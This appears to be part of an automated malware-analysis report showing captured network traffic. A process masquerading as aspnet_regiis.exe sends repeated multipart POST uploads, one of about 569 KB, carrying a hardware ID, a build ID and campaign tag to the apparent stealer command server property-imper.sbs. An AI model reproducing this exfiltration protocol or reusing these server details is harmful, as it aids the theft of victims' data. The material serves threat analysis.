                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 64 50 57 43 6f 37 35 6d 63 57 76 6c 50 6c 44 55 6a 73 45 47 6a 52 54 4f 50 41 6e 49 4c 4a 64 69 51 78 46 71 51 48 46 53 39 44 62 56 51 34 65 6d 4b 34 4d 68 2f 68 42 34 49 56 44 37 56 55 4e 6f 5a 52 34 39 61 63 77 34 6f 38 5a 48 6c 56 74 68 55 53 53 53 30 59 41 57 6f 6f 49 2f 68 33 44 2b 41 77 39 43 4a 78 30 78 4e 37 79 45 32 6b 6d 4d 33 45 78 32 35 35 50 77 36 5a 56 68 30 33 4c 48 46 50 64 57 6c 74 71 46 55 44 6f 52 44 46 46 56 36 67 49 58 62 42 51 72 57 65 79 34 76 47 41 45 42 65 46 75 35 57 55 7a 64 4c 62 55 45 74 4c 53 53 6f 4f 46 44 39 52 5a 64 51 47 4c 31 55 5a 34 68 61 34 35 69 63 33 4e 74 67 4e 6d 30 57 2b 46 59 53 64 41 45 74 43 57 34 2f 4e 71 39 65 50 6f 67 51 78 51 4a 5a 2f 51 74 30 35 30 43 79 68 4f 4b 36 6e 43 31 34 63 56 47 32 42 78 55 35 55
                                                                                  Data Ascii: dPWCo75mcWvlPlDUjsEGjRTOPAnILJdiQxFqQHFS9DbVQ4emK4Mh/hB4IVD7VUNoZR49acw4o8ZHlVthUSSS0YAWooI/h3D+Aw9CJx0xN7yE2kmM3Ex255Pw6ZVh03LHFPdWltqFUDoRDFFV6gIXbBQrWey4vGAEBeFu5WUzdLbUEtLSSoOFD9RZdQGL1UZ4ha45ic3NtgNm0W+FYSdAEtCW4/Nq9ePogQxQJZ/Qt050CyhOK6nC14cVG2BxU5U
                                                                                  2024-11-23 02:11:11 UTC1369INData Raw: 74 49 2f 31 6a 45 4b 67 67 2f 43 35 64 36 68 5a 37 68 47 2b 6b 67 39 43 36 74 78 6c 6e 65 45 62 69 4d 46 5a 68 45 48 39 42 4c 54 46 31 73 43 41 74 76 52 6e 53 41 41 33 42 41 58 58 4b 41 37 7a 41 78 63 53 66 62 69 34 73 47 4f 41 45 46 53 39 54 65 41 78 2f 4f 7a 50 72 64 67 50 6f 49 50 77 75 58 65 6f 57 65 34 52 79 72 6f 72 4b 6b 59 6f 2b 63 55 46 6f 6a 51 52 53 5a 78 42 39 4b 6c 64 72 42 50 35 6a 41 4b 45 5a 67 6b 30 50 39 55 59 67 68 6d 36 78 69 63 79 48 79 77 74 4d 50 57 65 32 46 56 56 35 46 48 38 51 49 7a 42 31 2f 69 42 59 2f 46 43 43 45 51 2b 31 52 6a 2f 49 54 71 4b 4e 30 6f 65 62 50 48 42 38 51 4b 4e 52 61 30 6b 38 4e 41 35 39 4a 43 54 6c 5a 42 61 52 49 4f 55 46 53 75 6f 34 52 76 46 53 70 4a 36 65 6f 6f 6f 34 64 54 38 59 34 41 34 56 4c 31 4d 59 43 57
                                                                                  Data Ascii: tI/1jEKgg/C5d6hZ7hG+kg9C6txlneEbiMFZhEH9BLTF1sCAtvRnSAA3BAXXKA7zAxcSfbi4sGOAEFS9TeAx/OzPrdgPoIPwuXeoWe4RyrorKkYo+cUFojQRSZxB9KldrBP5jAKEZgk0P9UYghm6xicyHywtMPWe2FVV5FH8QIzB1/iBY/FCCEQ+1Rj/ITqKN0oebPHB8QKNRa0k8NA59JCTlZBaRIOUFSuo4RvFSpJ6eooo4dT8Y4A4VL1MYCW


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549708104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:12 UTC281OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=N23RGOI0DWZUJ3Q
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12822
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:12 UTC12822OUTData Raw: 2d 2d 4e 32 33 52 47 4f 49 30 44 57 5a 55 4a 33 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 4e 32 33 52 47 4f 49 30 44 57 5a 55 4a 33 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 32 33 52 47 4f 49 30 44 57 5a 55 4a 33 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d
                                                                                  Data Ascii: --N23RGOI0DWZUJ3QContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--N23RGOI0DWZUJ3QContent-Disposition: form-data; name="pid"2--N23RGOI0DWZUJ3QContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--
                                                                                  2024-11-23 02:11:13 UTC1020INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=ssr7d0s9gok4un8akm385vst6b; expires=Tue, 18-Mar-2025 19:57:52 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O48331rQvwGQgXPScSZE%2F6GX8PE4bK%2FZuYO9vT0NamDmF4ibldU4kEtgQOlYYDhP%2B7c3kdLJoneonM4EbCiqfJ93jvjUBTRoahp%2FGBDbK%2FSQDy9Q5LaYLs38nEYky9qqMpsfVcA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0958d3842fd-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1760&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13761&delivery_rate=1645997&cwnd=247&unsent_bytes=0&cid=64699dccee109f59&ts=795&x=0"
                                                                                  2024-11-23 02:11:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 02:11:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549712104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:14 UTC278OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=XQLF3A2WQH5W
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15046
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:14 UTC15046OUTData Raw: 2d 2d 58 51 4c 46 33 41 32 57 51 48 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 58 51 4c 46 33 41 32 57 51 48 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 4c 46 33 41 32 57 51 48 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 58 51 4c 46 33 41 32 57 51
                                                                                  Data Ascii: --XQLF3A2WQH5WContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--XQLF3A2WQH5WContent-Disposition: form-data; name="pid"2--XQLF3A2WQH5WContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--XQLF3A2WQ
                                                                                  2024-11-23 02:11:15 UTC1021INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=38q34j1gps0gv13impvcf8dud1; expires=Tue, 18-Mar-2025 19:57:54 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnGjkW6VZ3cICUSFVSVJlpAJwkzofTmIZ%2BXEPRJ5lEDJm9bMtuRa9y%2FAXnLqr9K%2FGGv1F9bkXLiabIDW71rLgPRh1IUGeMJSCreHw1YPmwlctGlNCmsuSKuJQ%2B%2FND8C7hkkQPa8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0a38d9cc466-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15982&delivery_rate=1748502&cwnd=227&unsent_bytes=0&cid=01a608e47da88aa8&ts=807&x=0"
                                                                                  2024-11-23 02:11:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 02:11:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549714104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:17 UTC279OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=4WRWF5HSM9KRB
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20542
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:17 UTC15331OUTData Raw: 2d 2d 34 57 52 57 46 35 48 53 4d 39 4b 52 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 34 57 52 57 46 35 48 53 4d 39 4b 52 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 57 52 57 46 35 48 53 4d 39 4b 52 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 34 57 52 57 46 35
                                                                                  Data Ascii: --4WRWF5HSM9KRBContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--4WRWF5HSM9KRBContent-Disposition: form-data; name="pid"3--4WRWF5HSM9KRBContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--4WRWF5
                                                                                  2024-11-23 02:11:17 UTC5211OUTData Raw: 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: F3Wun 4F([:7s~X`nO`i
                                                                                  2024-11-23 02:11:18 UTC1017INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=ksigvdc7ci40bg4v73v6c0lga9; expires=Tue, 18-Mar-2025 19:57:56 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvTud9yAm5MMIfR%2FyuXHeihkvXoFd1f06c3OJM6iLZOCqLVKwVUG403FqlnLd3AZykT5g5TvE4%2FN1h4MORr2RfTwCmGWJpqdML0P9G6vDwttfLg%2BIveQtxSwxAMGMrxGdjFPxLg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0b23969c3f3-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1692&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21501&delivery_rate=1612368&cwnd=187&unsent_bytes=0&cid=159ed78111721112&ts=950&x=0"
                                                                                  2024-11-23 02:11:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 02:11:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549717104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:19 UTC279OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=GDLAT1QLDBQUDJ
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1239
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:19 UTC1239OUTData Raw: 2d 2d 47 44 4c 41 54 31 51 4c 44 42 51 55 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 47 44 4c 41 54 31 51 4c 44 42 51 55 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 44 4c 41 54 31 51 4c 44 42 51 55 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 47 44 4c
                                                                                  Data Ascii: --GDLAT1QLDBQUDJContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--GDLAT1QLDBQUDJContent-Disposition: form-data; name="pid"1--GDLAT1QLDBQUDJContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--GDL
                                                                                  2024-11-23 02:11:20 UTC1014INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=m77nq0laqfst8i63s3eq1pi9bv; expires=Tue, 18-Mar-2025 19:57:59 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KlcAX%2FbVTdGqPCMxBoF0eXgIcLMvfSj8snwLxIwlQbEMY7itZGBW5v%2F8VfZ9rvuYCESDCP6CTT8WaH3TvzTlhLN0Oj9MsUOMfZO3bup3ctEsxQa7vpxwNcPa03%2FCJawXBxS9yOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0c1eaf380d0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1736&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2154&delivery_rate=1635854&cwnd=208&unsent_bytes=0&cid=ae22c43187293182&ts=756&x=0"
                                                                                  2024-11-23 02:11:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-23 02:11:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549718104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:22 UTC277OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=C5R9OIAZWH
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 569082
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e
                                                                                  Data Ascii: --C5R9OIAZWHContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--C5R9OIAZWHContent-Disposition: form-data; name="pid"1--C5R9OIAZWHContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--C5R9OIAZWHCon
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 06 d2 7e 80 d7 ca ed b5 c6 ad 4b 71 5f f8 ce 04 98 3f 52 4c 94 dd fa 29 4b 7e ea 2b 7b 6d c7 e3 c2 2d ad be b0 57 fe 02 bf 75 25 93 7a be 09 a3 0c cd 47 6b 08 8b a5 52 e3 b2 12 25 e9 56 ae d0 c5 34 c9 84 b5 ec 85 f1 79 21 0d a7 96 a5 8e 5a 91 1c e5 29 7d 21 ca fd 7a 58 42 52 72 3b 53 39 06 16 4a f6 65 1a de 38 21 0d 26 e4 60 fd 70 7a a6 e0 5a 19 1f ec b3 55 e9 e5 e0 c7 6b 1d 54 04 df b0 6b 1a f6 f0 37 3e ae 1c 32 d6 8e 0a ae 05 90 d0 5d ba f0 d6 aa 89 24 7a 0e bb f6 3d 6f dd ad 45 89 b5 9b 1f ac 5e 58 d3 e8 85 68 79 b2 37 60 db ea a2 62 be 03 c1 8d 02 e3 27 17 0e bc eb d2 04 15 63 a9 0f 5f 7f 59 3f e6 f4 c0 9e eb 67 f3 da 3f 1b 62 cf f5 5c 98 7d f6 fe 02 92 40 c7 ff ac 81 bc 6f ba 0d ec 1a af aa aa 41 31 1d 9b 8f e8 50 e8 39 f2 f0 e5 a4 bc 8e ca d0 db 50
                                                                                  Data Ascii: ~Kq_?RL)K~+{m-Wu%zGkR%V4y!Z)}!zXBRr;S9Je8!&`pzZUkTk7>2]$z=oE^Xhy7`b'c_Y?g?b\}@oA1P9P
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 42 0a ec df 4f 51 14 a3 ac f1 81 23 7b d5 eb 83 f3 6f 29 77 89 0a ed c2 3c bf 9f 34 cf d2 1c 3e 2e 6d ee 9f 56 b2 f5 fb bf 42 6e e7 62 8c 72 6a e8 d0 cf f7 91 9c c2 a7 93 55 ef df 4a 05 08 79 72 d2 ab 6f d1 8d 2a 52 39 de 7d 61 b7 1f cd c9 0d 5c c9 a8 8e 19 9f b6 fb 22 c2 f1 4a 08 26 76 d1 c7 0e 85 24 a4 85 2b bb a2 c5 86 34 86 9a 7b f2 ca b0 12 e4 8d b5 5c 66 85 ad 5d be a7 d8 2f 15 6a 55 33 25 0d ad 03 eb fe 7b 7d 0f 26 4a 3f 49 c3 a1 6c dd 47 98 a6 a2 95 93 6f 25 17 c5 cf ef d2 5a 93 bc 94 48 3e 35 9c 37 5f 13 ca ad 50 e1 d0 0a 62 22 8c 52 dc 97 1f 59 50 4b b1 93 d2 f5 1e c6 a6 71 7b 1f 26 b4 87 ba 29 37 c5 92 90 0a 93 df 4c 02 3c 9c a4 0c 2f 5f d1 9b fe 25 31 f9 51 7b 93 5c 39 f9 f2 c9 37 b9 1b 15 1a 9b 8f 18 eb dd cb 3c dc 2f 3e e9 6c b0 f0 4b 7f 6b
                                                                                  Data Ascii: BOQ#{o)w<4>.mVBnbrjUJyro*R9}a\"J&v$+4{\f]/jU3%{}&J?IlGo%ZH>57_Pb"RYPKq{&)7L</_%1Q{\97</>lKk
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 16 f9 81 23 aa 16 44 d6 1f ef cf 56 07 0c bf 1c 7a ff 20 f3 76 81 69 41 9e 6d 72 9b 18 56 05 04 47 5c bb 6c 66 5e 38 57 94 ef b5 45 9f c5 68 c5 6b 86 37 c5 5a 43 70 d7 42 1e 73 77 70 46 8a dd 80 2a ab d3 52 42 18 f3 1b 8b 7f 98 89 22 73 4d c5 05 d5 87 55 af 7e 4b a4 ca 83 fd 18 27 28 a3 0a 52 d3 c2 cc df 36 f7 5f 7b d5 8d 28 dc b4 b8 0f 61 cf 0d 04 d8 53 3e a4 de 6c 3b b2 74 8c c8 f5 bb 6d c6 a8 2f 10 f3 94 c6 c2 9f 48 f7 cf cf 8a c3 c2 12 fc d6 b8 2e 6e 1c c8 a3 55 f5 8b 39 33 fd 43 64 a4 c0 64 e8 26 97 ab 62 fb eb ff 19 1e 7a 0b d3 66 ba 18 bd 01 4c 51 c2 37 74 c5 9f fe 6f 71 fb f6 9f 80 be e7 7e 4b 6e 49 f5 9e a9 4d e6 b9 2d ed 6f ef 12 de ae d2 0e 06 e7 44 e2 b9 eb a6 99 47 c4 f6 70 dd d4 f9 95 bd 5f c1 3d c6 0a 29 7c ff 00 77 b5 75 4e 7e 35 52 9c e7
                                                                                  Data Ascii: #DVz viAmrVG\lf^8WEhk7ZCpBswpF*RB"sMU~K'(R6_{(aS>l;tm/H.nU93Cdd&bzfLQ7toq~KnIM-oDGp_=)|wuN~5R
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: ae 60 67 e2 81 bb 1b 84 cf 74 1d ce df f7 78 a3 e1 8c d6 92 fa 5c 49 b1 07 bf c0 9f 77 a4 4f 7e 47 1b a3 75 fd e7 1a ec 83 1e 49 25 09 8b fc de 9a a8 37 c1 f9 70 88 dc 74 63 cd 5c 4d d5 93 af 3b 68 ab e3 e5 1a bd b1 1d ae 78 fa e1 77 8a 25 7d dc b3 40 bc 75 ed ac a0 4d 9f 8a 5a 56 c6 f0 26 10 55 d1 b1 d2 ef 70 04 2f 6c d2 d9 27 0c 37 0f 8a 07 09 5c da ef 74 5e 98 bc e4 ca 3a bc 73 9d 08 fe 2a 78 a8 76 c3 41 23 19 41 02 bb 88 5f 4d 71 c4 cc aa b5 52 62 9c 6f 5d a0 e8 c4 29 ba 65 2b e6 f9 b1 b6 6f 12 d2 4c eb 0e d5 f8 d1 2d 4d 4f 0d 39 d4 64 2f 6d a2 2a b6 05 c7 64 75 3f 72 94 eb 57 97 15 d9 61 d3 4c cc 54 4e a5 b5 be 79 d8 14 61 d4 6d ef 09 4e 83 dc dd 75 0e ba 89 fd b6 59 0a bd 51 81 9c 3f 0d 62 26 52 0e ce e1 61 0c bf 39 4e a9 bd 26 03 36 0b 12 94 54 a9
                                                                                  Data Ascii: `gtx\IwO~GuI%7ptc\M;hxw%}@uMZV&Up/l'7\t^:s*xvA#A_MqRbo])e+oL-MO9d/m*du?rWaLTNyamNuYQ?b&Ra9N&6T
